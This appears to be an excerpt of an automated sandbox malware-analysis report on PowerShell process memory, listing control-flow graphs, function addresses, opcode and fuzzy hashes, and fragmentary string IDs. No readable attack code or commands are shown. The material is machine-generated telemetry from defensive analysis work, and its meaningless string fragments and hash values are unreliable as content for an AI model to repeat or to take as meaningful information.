                                                                                      control_flow_graph 481 7ff848e95a76-7ff848e95a83 482 7ff848e95a85-7ff848e95a8d 481->482 483 7ff848e95a8e-7ff848e95b57 481->483 482->483 488 7ff848e95bc3 483->488 489 7ff848e95b59-7ff848e95b62 483->489 490 7ff848e95bc5-7ff848e95bea 488->490 489->488 491 7ff848e95b64-7ff848e95b70 489->491 497 7ff848e95c56 490->497 498 7ff848e95bec-7ff848e95bf5 490->498 492 7ff848e95b72-7ff848e95b84 491->492 493 7ff848e95ba9-7ff848e95bc1 491->493 495 7ff848e95b86 492->495 496 7ff848e95b88-7ff848e95b9b 492->496 493->490 495->496 496->496 499 7ff848e95b9d-7ff848e95ba5 496->499 501 7ff848e95c58-7ff848e95d00 497->501 498->497 500 7ff848e95bf7-7ff848e95c03 498->500 499->493 502 7ff848e95c05-7ff848e95c17 500->502 503 7ff848e95c3c-7ff848e95c54 500->503 512 7ff848e95d02-7ff848e95d0c 501->512 513 7ff848e95d6e 501->513 504 7ff848e95c19 502->504 505 7ff848e95c1b-7ff848e95c2e 502->505 503->501 504->505 505->505 508 7ff848e95c30-7ff848e95c38 505->508 508->503 512->513 514 7ff848e95d0e-7ff848e95d1b 512->514 515 7ff848e95d70-7ff848e95d99 513->515 516 7ff848e95d54-7ff848e95d6c 514->516 517 7ff848e95d1d-7ff848e95d2f 514->517 521 7ff848e95e03 515->521 522 7ff848e95d9b-7ff848e95da6 515->522 516->515 519 7ff848e95d31 517->519 520 7ff848e95d33-7ff848e95d46 517->520 519->520 520->520 523 7ff848e95d48-7ff848e95d50 520->523 525 7ff848e95e05-7ff848e95eab 521->525 522->521 524 7ff848e95da8-7ff848e95db6 522->524 523->516 526 7ff848e95db8-7ff848e95dca 524->526 527 7ff848e95def-7ff848e95e01 524->527 534 7ff848e95eb3-7ff848e95eed call 7ff848e95f34 525->534 535 7ff848e95ead 525->535 528 7ff848e95dcc 526->528 529 7ff848e95dce-7ff848e95de1 526->529 527->525 528->529 529->529 531 7ff848e95de3-7ff848e95deb 529->531 531->527 541 7ff848e95ef2-7ff848e95f18 534->541 535->534 543 7ff848e95f1a 541->543 544 7ff848e95f1f-7ff848e95f33 541->544 543->544
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: r9B8$r9B8
                                                                                      • API String ID: 0-2917399790
                                                                                      • Opcode ID: ba9656de41c3312acb75eca44dfff9f953b32e6d1d02c480a5536826f4738bab
                                                                                      • Instruction ID: 7d8902ee4413f4aaf44bd203279fc7c1f4d9157fec264f4c3ddfff3028851bce
                                                                                      • Opcode Fuzzy Hash: ba9656de41c3312acb75eca44dfff9f953b32e6d1d02c480a5536826f4738bab
                                                                                      • Instruction Fuzzy Hash: D9F1B53090CA8E8FEBA8EF28C8557E93BD1FF54354F04426EE84DC7291DB7498458B86
                                                                                      Function 00007FF848E96822 Relevance: 3.0, Strings: 2, Instructions: 460COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 545 7ff848e96822-7ff848e9682f 546 7ff848e96831-7ff848e96839 545->546 547 7ff848e9683a-7ff848e96907 545->547 546->547 552 7ff848e96973 547->552 553 7ff848e96909-7ff848e96912 547->553 554 7ff848e96975-7ff848e9699a 552->554 553->552 555 7ff848e96914-7ff848e96920 553->555 561 7ff848e96a06 554->561 562 7ff848e9699c-7ff848e969a5 554->562 556 7ff848e96922-7ff848e96934 555->556 557 7ff848e96959-7ff848e96971 555->557 559 7ff848e96936 556->559 560 7ff848e96938-7ff848e9694b 556->560 557->554 559->560 560->560 563 7ff848e9694d-7ff848e96955 560->563 565 7ff848e96a08-7ff848e96a2d 561->565 562->561 564 7ff848e969a7-7ff848e969b3 562->564 563->557 566 7ff848e969b5-7ff848e969c7 564->566 567 7ff848e969ec-7ff848e96a04 564->567 571 7ff848e96a9b 565->571 572 7ff848e96a2f-7ff848e96a39 565->572 568 7ff848e969c9 566->568 569 7ff848e969cb-7ff848e969de 566->569 567->565 568->569 569->569 573 7ff848e969e0-7ff848e969e8 569->573 575 7ff848e96a9d-7ff848e96acb 571->575 572->571 574 7ff848e96a3b-7ff848e96a48 572->574 573->567 576 7ff848e96a81-7ff848e96a99 574->576 577 7ff848e96a4a-7ff848e96a5c 574->577 582 7ff848e96b3b 575->582 583 7ff848e96acd-7ff848e96ad8 575->583 576->575 578 7ff848e96a60-7ff848e96a73 577->578 579 7ff848e96a5e 577->579 578->578 581 7ff848e96a75-7ff848e96a7d 578->581 579->578 581->576 584 7ff848e96b3d-7ff848e96c2a 582->584 583->582 585 7ff848e96ada-7ff848e96ae8 583->585 596 7ff848e96c32-7ff848e96c4c 584->596 597 7ff848e96c2c 584->597 586 7ff848e96b21-7ff848e96b39 585->586 587 7ff848e96aea-7ff848e96afc 585->587 586->584 589 7ff848e96b00-7ff848e96b13 587->589 590 7ff848e96afe 587->590 589->589 591 7ff848e96b15-7ff848e96b1d 589->591 590->589 591->586 600 7ff848e96c55-7ff848e96c94 call 7ff848e96cb0 596->600 597->596 605 7ff848e96c96 600->605 606 7ff848e96c9b-7ff848e96caf 600->606 605->606
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: r9B8$r9B8
                                                                                      • API String ID: 0-2917399790
                                                                                      • Opcode ID: 57539ac98aa42c4776a22463f4677439c809e112e386d3bbe89fbfc4ce667184
                                                                                      • Instruction ID: 10c54c72fc4453e3ded912b57b8803158fa5174221b1c392c32cde472ffcf776
                                                                                      • Opcode Fuzzy Hash: 57539ac98aa42c4776a22463f4677439c809e112e386d3bbe89fbfc4ce667184
                                                                                      • Instruction Fuzzy Hash: 85E1D33090CA8E8FEBA8EF28C8557E977D1FB54354F14826ED84DC72A1DF78A8448785
                                                                                      Function 00007FF848E8AF80 Relevance: 1.8, APIs: 1, Instructions: 334comCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID:
                                                                                      • API String ID: 542301482-0
                                                                                      • Opcode ID: 1a8a13c7247f74652af91a716a411aae1585e34c6151bf31b2f8dfc27dfeada2
                                                                                      • Instruction ID: 754665841a7f6dc15a52ec1a81655658afc685802f0a5b8baf910dfe45c9a30b
                                                                                      • Opcode Fuzzy Hash: 1a8a13c7247f74652af91a716a411aae1585e34c6151bf31b2f8dfc27dfeada2
                                                                                      • Instruction Fuzzy Hash: BA910571A0CA498FEB5CEB6C98497B97BE1FB99321F04427ED00DC3292DF3468468795
                                                                                      Function 00007FF848E8E5B9 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 735 7ff848e8e5b9-7ff848e8e5bd 736 7ff848e8e5c5 735->736 737 7ff848e8e5bf 735->737 738 7ff848e8e5c7 736->738 739 7ff848e8e5c8-7ff848e8e5d9 736->739 737->736 738->739 740 7ff848e8e5db 739->740 741 7ff848e8e5dc-7ff848e8e676 IUnknown_QueryInterface_Proxy 739->741 740->741 744 7ff848e8e678 741->744 745 7ff848e8e67e-7ff848e8e69b 741->745 744->745
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: Interface_ProxyQueryUnknown_
                                                                                      • String ID:
                                                                                      • API String ID: 2522245112-0
                                                                                      • Opcode ID: 98dd243f64a4e4d1b947d860d69e2f219703e2f751da5d81bbe8783600689419
                                                                                      • Instruction ID: 562da1a0d699962f5698db27403f7eb4936bd696d30009b0ea97744677dbbe8d
                                                                                      • Opcode Fuzzy Hash: 98dd243f64a4e4d1b947d860d69e2f219703e2f751da5d81bbe8783600689419
                                                                                      • Instruction Fuzzy Hash: FB31287191CB884FD729AB6C9C1A6BA7FF4EB56321F04417FE089C3152DB246446CB86
                                                                                      Function 00007FF848F5328D Relevance: .4, Instructions: 376COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2850351977.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848f50000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1eeafb39882a18320920be99d1280aa52de208b4e373adc283c6401737e2fa09
                                                                                      • Instruction ID: dfa3755b5be7ef6308fa8a313425ae09fe7253b300be83e304c65ef929a9e2d7
                                                                                      • Opcode Fuzzy Hash: 1eeafb39882a18320920be99d1280aa52de208b4e373adc283c6401737e2fa09
                                                                                      • Instruction Fuzzy Hash: DDB12531E0EA8A4FE796EB2C98555B5BBE1EF57290F8801FAD00DC71D3DE28AC058355
                                                                                      Function 00007FF848F533B2 Relevance: .1, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2850351977.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848f50000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b1c1f6b04db24386fd15bb6e626623c9d493d02aa17c62126df652aebc59328
                                                                                      • Instruction ID: 44ec46b42eef9f7c9b42b33cadaa6ff2bb32824d2a311ec7a481042c98de5813
                                                                                      • Opcode Fuzzy Hash: 1b1c1f6b04db24386fd15bb6e626623c9d493d02aa17c62126df652aebc59328
                                                                                      • Instruction Fuzzy Hash: 0F31D432E1EA864FF7AAA72C5815178AAD1EF476A0F9801FAE40DC71D3DF1C6C14421A

                                                                                      Non-executed Functions

                                                                                      Function 00007FF848E87058 Relevance: 14.4, Strings: 11, Instructions: 626COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: x6n$x6n$x6n$x6n$x6n$x6n$x6n$x6n$x6n$x6n$x6n
                                                                                      • API String ID: 0-296243896
                                                                                      • Opcode ID: 1794bc431c44b99540e7c5b8776aefae6092375c31f72dd2fb384f2f24b04e50
                                                                                      • Instruction ID: 246a8a0154c20af8e824e6c928629525d6767057008a82ca9f8daf246781f55c
                                                                                      • Opcode Fuzzy Hash: 1794bc431c44b99540e7c5b8776aefae6092375c31f72dd2fb384f2f24b04e50
                                                                                      • Instruction Fuzzy Hash: 9C022561E1D94A4FE399EA2C985A779B7D2FF98780F9441BAC00DC72D2CF386C428345

                                                                                      Executed Functions

                                                                                      Function 0731A15D Relevance: 15.7, Strings: 12, Instructions: 704COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                                                      • API String ID: 0-2265583125
                                                                                      • Opcode ID: 49f33c243e37133078c48054b8b1073fa91b6b570dd3fa9952ba1b46a93eb6cd
                                                                                      • Instruction ID: fa9216809a7224d3f2d1f91e7d0307785658de46fbf3c3f15990ab8d46efb09d
                                                                                      • Opcode Fuzzy Hash: 49f33c243e37133078c48054b8b1073fa91b6b570dd3fa9952ba1b46a93eb6cd
                                                                                      • Instruction Fuzzy Hash: 71625EB4A402189FDB14DB64C991BAEBBB2EF84304F1085E5D9096F395CB359E81CF92
                                                                                      Function 07315608 Relevance: 9.1, Strings: 7, Instructions: 301COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$:
                                                                                      • API String ID: 0-1641663427
                                                                                      • Opcode ID: 6259469b4a7a024d67de668bd2bd20fac979dc6ee4ffe2a2c460baade71c6225
                                                                                      • Instruction ID: dd67ab1ea8f532e6110e44a23d04cfd6aab041e470d21b974ac94f86aab30cb6
                                                                                      • Opcode Fuzzy Hash: 6259469b4a7a024d67de668bd2bd20fac979dc6ee4ffe2a2c460baade71c6225
                                                                                      • Instruction Fuzzy Hash: B3C181B4B00214DFDB28DB54C991BAEBBB2EF84304F1084A9D5096F395CB75DD86CB92
                                                                                      Function 07314E28 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                                                      • API String ID: 0-3975720690
                                                                                      • Opcode ID: 6c7e3769300b0299d5fdb9fefa679bcff442e34a2b5a266ee2372ad1d0de9a2d
                                                                                      • Instruction ID: 21ff073a669a70a3a768c31c659fe61913f884fc8ccf2ce1baadb3ab18ff591a
                                                                                      • Opcode Fuzzy Hash: 6c7e3769300b0299d5fdb9fefa679bcff442e34a2b5a266ee2372ad1d0de9a2d
                                                                                      • Instruction Fuzzy Hash: 5BD1B2B4B002059FDB18DB68C551BAEBBB2EF85304F15C429D8056F395CB76DC46CBA2
                                                                                      Function 0731F308 Relevance: 5.7, Strings: 4, Instructions: 656COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq
                                                                                      • API String ID: 0-4000621977
                                                                                      • Opcode ID: 90d2c1fe2bcd88314de7ea3437a06c443722bb045e20396760b81d13d1e79f4a
                                                                                      • Instruction ID: 0f6b17a026dd7e059fa0c9707c168eda5e95acf8120adcbcdbbd496fdaea9342
                                                                                      • Opcode Fuzzy Hash: 90d2c1fe2bcd88314de7ea3437a06c443722bb045e20396760b81d13d1e79f4a
                                                                                      • Instruction Fuzzy Hash: 262237F1B053139FE7199A78881177ABBE6AFC1310F1484BAD809DF695DB36C841C7A2
                                                                                      Function 02DACF68 Relevance: 4.3, Strings: 3, Instructions: 519COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Hnq$$jq$$jq
                                                                                      • API String ID: 0-266315406
                                                                                      • Opcode ID: 9661dc0d474f586a7bdb2346d0d3a8615f83a009ddbbc4d01c67adabb821c254
                                                                                      • Instruction ID: 7ecf17ca3687d0c9f3805feb58cf9c250bdf6191dfff09ddf9b519488d196f2d
                                                                                      • Opcode Fuzzy Hash: 9661dc0d474f586a7bdb2346d0d3a8615f83a009ddbbc4d01c67adabb821c254
                                                                                      • Instruction Fuzzy Hash: 27225F34B002149FCB25DB64C964BAEB7F6BF89305F1444A9D40AAB3A5CB35DE85CF81
                                                                                      Function 07314E08 Relevance: 4.0, Strings: 3, Instructions: 269COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq
                                                                                      • API String ID: 0-3078559419
                                                                                      • Opcode ID: cb72ebbbdf442d4010f9ba660c317fcc10b72765a53c9b88704f0baee32cb061
                                                                                      • Instruction ID: fc3aae8cd994baa87e1a024161657271b8d688db8e4f106285462345a9ad6739
                                                                                      • Opcode Fuzzy Hash: cb72ebbbdf442d4010f9ba660c317fcc10b72765a53c9b88704f0baee32cb061
                                                                                      • Instruction Fuzzy Hash: 4CB1B2B4A002059FDB18CF54C551BAEBBB2EF89304F15C469D8096F395CB76EC46CBA2
                                                                                      Function 07310148 Relevance: 3.9, Strings: 3, Instructions: 172COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $jq$$jq$$jq
                                                                                      • API String ID: 0-3696375380
                                                                                      • Opcode ID: 849a39fe00027f4252b04f56f9f9d075cad3651786bc393c7c29f1b888c004dd
                                                                                      • Instruction ID: 2a2c3fb0659c83c995817b4e9dc582a1e6e558b771d3e86b4938d3c61cd01865
                                                                                      • Opcode Fuzzy Hash: 849a39fe00027f4252b04f56f9f9d075cad3651786bc393c7c29f1b888c004dd
                                                                                      • Instruction Fuzzy Hash: CA513AB570430A9FE72C9A69C80076BBBA6EFC6310F14C4BBD54DDB681DA35C981C7A1
                                                                                      Function 0731B591 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq
                                                                                      • API String ID: 0-1204115232
                                                                                      • Opcode ID: 573ca568276a3d693511bdb617b682a6d42a4496625801cd17aae35eb1d3586c
                                                                                      • Instruction ID: 4c0a0ebcb6a8be91fbd9e893acb7f11ac5e0c012a218312944c70d5b4c2aa368
                                                                                      • Opcode Fuzzy Hash: 573ca568276a3d693511bdb617b682a6d42a4496625801cd17aae35eb1d3586c
                                                                                      • Instruction Fuzzy Hash: 0E024EB4A402199FD724DB24C990BAEBBB2EF84304F1081E5D94D6F795CB719E81CF92
                                                                                      Function 07315A83 Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq
                                                                                      • API String ID: 0-1204115232
                                                                                      • Opcode ID: 809755ee576ca45e79aef34127ec18158588cf880d613dca728b90522a67335e
                                                                                      • Instruction ID: 760f53833a97c338922179f1b6eb87b92011184df563505fa740862191b6d936
                                                                                      • Opcode Fuzzy Hash: 809755ee576ca45e79aef34127ec18158588cf880d613dca728b90522a67335e
                                                                                      • Instruction Fuzzy Hash: ACF1A0B4B00215DFEB28DB68C951F6EBBA6AF84304F10C4A5E4096F7A5CB71DD41CB92
                                                                                      Function 0731A880 Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq
                                                                                      • API String ID: 0-1204115232
                                                                                      • Opcode ID: 39ce998c0d759f34782c7613a6847461980cc81bd3225ce17d0028a76c7e68e1
                                                                                      • Instruction ID: 0f152a88b6712b157cbec3569cea5b54547840a3cf3933030901528847588e40
                                                                                      • Opcode Fuzzy Hash: 39ce998c0d759f34782c7613a6847461980cc81bd3225ce17d0028a76c7e68e1
                                                                                      • Instruction Fuzzy Hash: 9CE1B4B0B402149FD714EB28C955BAEBBA2EF84304F10C5A9D9096F395CF75DD818F92
                                                                                      Function 07312064 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 84l$tPjq
                                                                                      • API String ID: 0-2912020916
                                                                                      • Opcode ID: 9b12ec1914d77652d5dc5ac4e1fff9fa48f15b9e5d47475fd8f539cb24ebb30e
                                                                                      • Instruction ID: 726abe40ce4a7a32a0f338b2549a819d94d67305db90510278366bdb0c320ea4
                                                                                      • Opcode Fuzzy Hash: 9b12ec1914d77652d5dc5ac4e1fff9fa48f15b9e5d47475fd8f539cb24ebb30e
                                                                                      • Instruction Fuzzy Hash: E851B0B07493C59FD7168B648C24A56BFB1BF87204F1AC0EBD5488F1A3C6769C46C762
                                                                                      Function 0731D0A5 Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq
                                                                                      • API String ID: 0-1204115232
                                                                                      • Opcode ID: caeb0e4bb42d1247806ea288c330610cb6b8823e1e727c984285be6b7788fde9
                                                                                      • Instruction ID: 340922aa8efc55627e5321fb197a6e8317dc7b7a795f6bfe3ac589cf53eb3018
                                                                                      • Opcode Fuzzy Hash: caeb0e4bb42d1247806ea288c330610cb6b8823e1e727c984285be6b7788fde9
                                                                                      • Instruction Fuzzy Hash: 6D316AF17603129BEB6C5678981037EB796AFC3210F10847AC50ADF685EF7AC842C792
                                                                                      Function 07310128 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $jq$$jq
                                                                                      • API String ID: 0-3720491408
                                                                                      • Opcode ID: 7fbc47ed89d4d8a5979cf5c2657af94b37b42bfd52822c32e2d7a667d4a1a362
                                                                                      • Instruction ID: 3e4d6dbdee584f71c29e673e51a4c67efab0b37af8bfd2b2c60b3d3a77374ad5
                                                                                      • Opcode Fuzzy Hash: 7fbc47ed89d4d8a5979cf5c2657af94b37b42bfd52822c32e2d7a667d4a1a362
                                                                                      • Instruction Fuzzy Hash: A211E9B590534ADFE71D8F54C9006A6BFB1AF42610F1640BBD85CDB142E739C9C0CBA1
                                                                                      Function 02DA3A98 Relevance: .7, Instructions: 655COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 84e8288120f91160e95915012c9f7d29b286565761318f88dced05c77bb2012a
                                                                                      • Instruction ID: 02d0e1a234e48aded918326170fc41fae23d436db90ec4b6d295cc056d69a739
                                                                                      • Opcode Fuzzy Hash: 84e8288120f91160e95915012c9f7d29b286565761318f88dced05c77bb2012a
                                                                                      • Instruction Fuzzy Hash: 23522674A01209DFCB55CFA8D594A9EFBB2FF88310F248199E805AB365C771ED85CB90
                                                                                      Function 07313D90 Relevance: .6, Instructions: 568COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f6a60a159d4f99dc03aaa596eb80c3621ee94634a32ecebdb6edd7433e65b297
                                                                                      • Instruction ID: 77d3505f2b3fd8907615546368dfddd3dad0a52ef18a7b1460dafb7c4328cd4f
                                                                                      • Opcode Fuzzy Hash: f6a60a159d4f99dc03aaa596eb80c3621ee94634a32ecebdb6edd7433e65b297
                                                                                      • Instruction Fuzzy Hash: E9322AB4B10215DFD718CB98C551BAABBB2EF89314F15C069E809AF355CB72EC41CB92
                                                                                      Function 07314269 Relevance: .5, Instructions: 476COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d5e92ecc16f1917e20eaa7c8c913e46161384ef84d20fc67f34f43f7489a8842
                                                                                      • Instruction ID: 396d07c4b68e051625883ce7bf999ef7be0a1d5888e5b1133c0bb920939f9f0e
                                                                                      • Opcode Fuzzy Hash: d5e92ecc16f1917e20eaa7c8c913e46161384ef84d20fc67f34f43f7489a8842
                                                                                      • Instruction Fuzzy Hash: E0122AB4A10215DFE718CB98C551BAABBB2FF88714F15C069E809AF355CB72EC41CB91
                                                                                      Function 02DA3270 Relevance: .3, Instructions: 325COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77713a4cf522283d26b26602300740e213fdcefdb5544cd6a3d51d2e132e140c
                                                                                      • Instruction ID: 294a7c7e48d35b21926643fde4683ef3bc271688a5fbc081b30ec648d102951c
